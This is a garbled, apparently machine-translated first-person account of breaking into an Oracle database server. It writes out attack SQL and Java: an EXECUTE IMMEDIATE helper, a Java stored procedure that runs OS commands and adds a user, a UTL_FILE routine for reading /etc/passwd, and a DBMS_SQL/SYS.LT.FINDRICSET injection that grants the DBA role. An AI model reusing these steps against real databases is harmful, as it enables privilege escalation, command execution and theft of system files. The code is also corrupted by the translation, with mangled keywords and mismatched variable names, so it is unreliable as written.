Soon, I connected to the oracle server and found: 1. the dba permission is not granted after the connection. 2. SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES vulnerability 3. run SELECTUTL_HTTP.request (http: xxxxxxxxxxxlogin. jsp) after FROMdual, it is found that the oracle server cannot connect to the network. Lucky
Soon, I connected to the oracle server and found that:
1. the dba permission is not granted after the connection.
2. You cannot use SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES to escalate permissions.
3. Run SELECT UTL_HTTP.request (&LsQuo; http: // xxxxxxxxxxx/login. jsp ') FROMDuThe oracle server cannot connect to the network.
Fortunately,
Run
Create or replace fuNcTion Linx_Query (p varchar2) return number authIdCurrent_user is beginExECutE immEdIate p; return 1; end;
Successful! This user has the create proceduce permission.
Now I want to create a java extension for execution.Command:
Create or replace and compile java source named "LinxUtil" as import java. io. *; public class LinxUtil extends Object {publicStatIc STrIng runCMD (String args) {try {BufferedReader myReader = new BufferedReader (new InputStreamReader (RunTime.Getruntime(cmd.exe c (args). getInputStream (); String stemp, str = ""; while (stemp = myReader. readLine ())! = Null) str + = stemp + ""; myReader. close (); return str ;}CatCh (Exception e) {return e. toString ();}}}
Begin dbms_java.grant_peRmIssion ('public', 'sys: java. io. filepermission', '<>', 'execute '); end;
Create or replace function LinxRunCMD (p_cmd in varchar2) return varchar2 as language java name 'linxutil. runCMD (java. lang. String) return string'
Select * from all_objects where object_name like '% LINX %'
Grant all on LinxRunCMD to public
Select LinxRunCMD ('cmd/c net user linx/Dd') From dual
But the first step gets stuck. The server cannot create java extensions for some unknown reason !!
Fortunately, we also have the UTL library available to use:
Create or replace function LinxUTLReaDfIle (FileName varchar2) return varchar2 is
FHandler UTL_FILE.FILE_TYPE;
Buf varchar2 (4000 );
Output varchar2 (8000 );
BEGIN
FHandler: = UTL_FILE.FOPEN ('utl _ FILE_DIR ', filename, 'R ');
Loop
Begin
Utl_file.get_line (fHandler, buf );
DBMS_OUTPUT.PUT_LINE ('cursor: '| buf );
Exception
When no_data_found then exit;
End;
Output: = output | buf | chr (10 );
End loop;
UTL_FILE.FCLOSE (fHandler );
Return output;
END;
UTL_FILE_DIR must be used first:
Create or replace directory UTL_FILE_DIR AS '/etc ';
Specify the object. However, no permission is found after running. I had to find a way to raise the right.
***************
I wrote N pdf files to introduce this technology. I simplified the Code:
DECLARE
Skype NUMBER;
BEGIN
PY: = DBMS_ SQL .OPEN_CURSOR;
DBMS_ SQL .PARSE (ACC, 'descare pragma autonomous_transaction; begin execute immediate "GRANT DBA TO linxlinx_current_db_user"; commit; end; ', 0 );
DBMS_OUTPUT.PUT_LINE ('cursor: '| metrics );
Begin sys. LT. FINDRICSET ('.' | dbms_ SQL .execute ('| YY |') | ")-', 'x'); END;
Raise NO_DATA_FOUND;
EXCEPTION
WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE ('cursor: '| ACC );
When others then DBMS_OUTPUT.PUT_LINE ('cursor: '| ACC );
END;
After the operation, you have the dba permission to reconnect to the database ......
Now you can read the file:
Create or replace directory UTL_FILE_DIR AS '/etc ';
Select LinxUTLReadfile ('Passwd') From dual
It's easy to follow.